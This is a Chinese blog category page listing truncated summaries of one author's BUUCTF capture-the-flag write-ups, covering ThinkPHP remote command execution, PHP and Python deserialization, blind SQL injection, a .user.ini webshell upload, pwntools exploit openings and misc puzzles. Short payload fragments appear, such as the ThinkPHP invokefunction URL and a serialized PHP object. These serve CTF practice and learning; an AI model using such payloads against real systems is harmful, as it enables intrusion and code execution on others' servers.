随笔分类 -  Buu

摘要:[ThinkPHP]5-Rce v5.0.23及v5.1.31以下版本远程命令执行漏洞 http://node3.buuoj.cn:29858/index.php ?s=index/think\app/invokefunction &function=call_user_func_array &va 阅读全文
posted @ 2020-09-16 22:53 东坡肉肉君 阅读(290) 评论(0) 推荐(0) 编辑
摘要:(反序列化)[网鼎杯 2020 青龙组]AreUSerialz O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";s:6:"laolao";} 知识点: protected绕过:php7.1+ 阅读全文
posted @ 2020-05-13 23:28 东坡肉肉君 编辑
摘要:题解网上其他师傅已经写过了而且写的很详细,菜鸡只好写一下自己做题中的笔记 Payload : #coding:utf-8 from pwn import * context(log_level = 'debug', arch = 'i386', os = 'linux') p=remote('nod 阅读全文
posted @ 2020-02-17 19:30 东坡肉肉君 阅读(878) 评论(1) 推荐(1) 编辑
摘要:这题算得上是python的使用 破解压缩包: from threading import Thread from unrar import rarfile def CreatePwd(): f = open('passdict.txt', 'w') for id in range(10000): p 阅读全文
posted @ 2020-02-10 21:02 东坡肉肉君 阅读(614) 评论(0) 推荐(0) 编辑
摘要:# encoding=utf-8 from pwn import * from LibcSearcher import * sh = remote('node3.buuoj.cn',29416) # sh = process('./ciscn_2019_c_1') # sh = remote('no 阅读全文
posted @ 2019-12-15 18:23 东坡肉肉君 阅读(2263) 评论(2) 推荐(1) 编辑
摘要:01editor 选择 EBCDIC编码得到压缩包的密码 这里用到的是福尔摩斯里面的跳舞的小人加密 结果是:iloveholmesandwllm 阅读全文
posted @ 2019-12-10 12:50 东坡肉肉君 阅读(1626) 评论(2) 推荐(0) 编辑
摘要:这题真的就是拼二维码,然后按照提示解码,13是rot13,其他大师傅已经给出详细的题解了,菜狗就在这里贴上找到的解题工具网站: Rot13解密的时候注意大小写保留,用这个:https://rot13.com/ Base85在线加密解密:https://base85.io/ 详细题解走大佬博客: ht 阅读全文
posted @ 2019-12-06 11:30 东坡肉肉君 阅读(1473) 评论(0) 推荐(0) 编辑
摘要:这题真的就靠百度的,第一次接触TTL型的misc,直接拿了一个大佬的脚本,改了一丢丢: with open('t.txt') as f: lines = f.readlines() n_num = [] #分析出所有的数 for i in lines: if i!='\n': n_num.appen 阅读全文
posted @ 2019-12-06 07:34 东坡肉肉君 阅读(472) 评论(0) 推荐(0) 编辑
摘要:拖到binwalk里面发现4个压缩包: 查找一下RAR的文件头,然后把它们提取出来: 第一个base64一下得到第二个压缩包的密码: 第二个压缩包可以,emmm,保存一下扩充一下自己的表情包库: 第三个里面是一个doc,base64无限解码得到第四个的密码: 第四个解出来有一个音乐: 看一下波形图是 阅读全文
posted @ 2019-12-06 00:00 东坡肉肉君 阅读(2079) 评论(4) 推荐(0) 编辑
摘要:步骤: 找到lv6的购买出,修改折扣买lv6 ;然后找到admin的登陆界面,JWT破解,登陆admin ;点击一键成为大会员,利用python反序列化漏洞读取flag 解析: 这题师傅们的WP已经很详细了,我就记录一下我自己不懂的点 import pickle import urllib clas 阅读全文
posted @ 2019-11-03 14:24 东坡肉肉君 阅读(939) 评论(0) 推荐(0) 编辑
摘要:步骤: 1.运行这个: <?php class User { public $db; } class File { public $filename; } class FileList { private $files; public function __construct() { $file = 阅读全文
posted @ 2019-11-03 11:08 东坡肉肉君 阅读(2060) 评论(0) 推荐(0) 编辑
摘要:步骤: nickname[]=wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere 阅读全文
posted @ 2019-11-03 01:24 东坡肉肉君 阅读(968) 评论(0) 推荐(1) 编辑
摘要:1.在注册后发现这个界面,猜测是不是存在注入点 http://654000be-ea72-4eae-8074-c6cf2798c9e9.node3.buuoj.cn/view.php?no=1and1 http://654000be-ea72-4eae-8074-c6cf2798c9e9.node3 阅读全文
posted @ 2019-11-02 22:07 东坡肉肉君 阅读(2066) 评论(0) 推荐(2) 编辑
摘要:解法一字符串拼接: 1.得到签名sign http://8fa4531c-1164-49b7-a700-70e77e6aacb7.node3.buuoj.cn/geneSign?param=flag.txtread 2.添加Cookie发送请求得到flag Cookie: action=readsc 阅读全文
posted @ 2019-10-30 15:10 东坡肉肉君 阅读(1457) 评论(0) 推荐(0) 编辑
摘要:看一下页面源码,发现了提示: calc.php?num=encodeURIComponent(("#content").val())("#content").val() 是什么意思: 获取id为content的HTML标签元素的值,是JQuery, $("#content")相当于docume 阅读全文
posted @ 2019-10-29 10:34 东坡肉肉君 阅读(6057) 评论(0) 推荐(3) 编辑
摘要:将得到的交上去居然不对: 然而大写却过了: flag{ILOVEYOU} 因为摩斯电码在设计的时候就没有区分大小写,而且从码表中可以看到,都是大写,所以在网站上解密出来的自己转成大写 阅读全文
posted @ 2019-10-25 23:27 东坡肉肉君 阅读(1280) 评论(0) 推荐(1) 编辑
摘要:题目:e00cf25ad42683b3df678c61f42c6bda flag{admin1} 算是一个资源收集吧,Orz,https://www.cmd5.com/ 阅读全文
posted @ 2019-10-25 22:56 东坡肉肉君 阅读(958) 评论(0) 推荐(0) 编辑
摘要: 阅读全文
posted @ 2019-10-25 22:49 东坡肉肉君 阅读(2648) 评论(0) 推荐(0) 编辑
摘要:感觉这题师傅们已经写得很详细了,我就做一个思路梳理吧,顺道学一波.user.ini 步骤: 1.上传一个“.user.ini”文件 2.上传自己的马“a.jpg” 3.菜刀连接 "http://b302f16c-6762-4496-be93-e544912aaf0d.node3.buuoj.cn/u 阅读全文
posted @ 2019-10-25 21:52 东坡肉肉君 阅读(1842) 评论(0) 推荐(0) 编辑
摘要:id=0 id=1 id=2 id=3 发现结果不一样,尝试 : ">4","=4","<4" : 在自己的环境下验证一下: 爆一下数据库: id=(ascii(substr(database(),1,1))>32) ''' @Modify Time @Author 2019/10/25 19:28 阅读全文
posted @ 2019-10-25 19:57 东坡肉肉君 阅读(3142) 评论(1) 推荐(1) 编辑

点击右上角即可分享
微信分享提示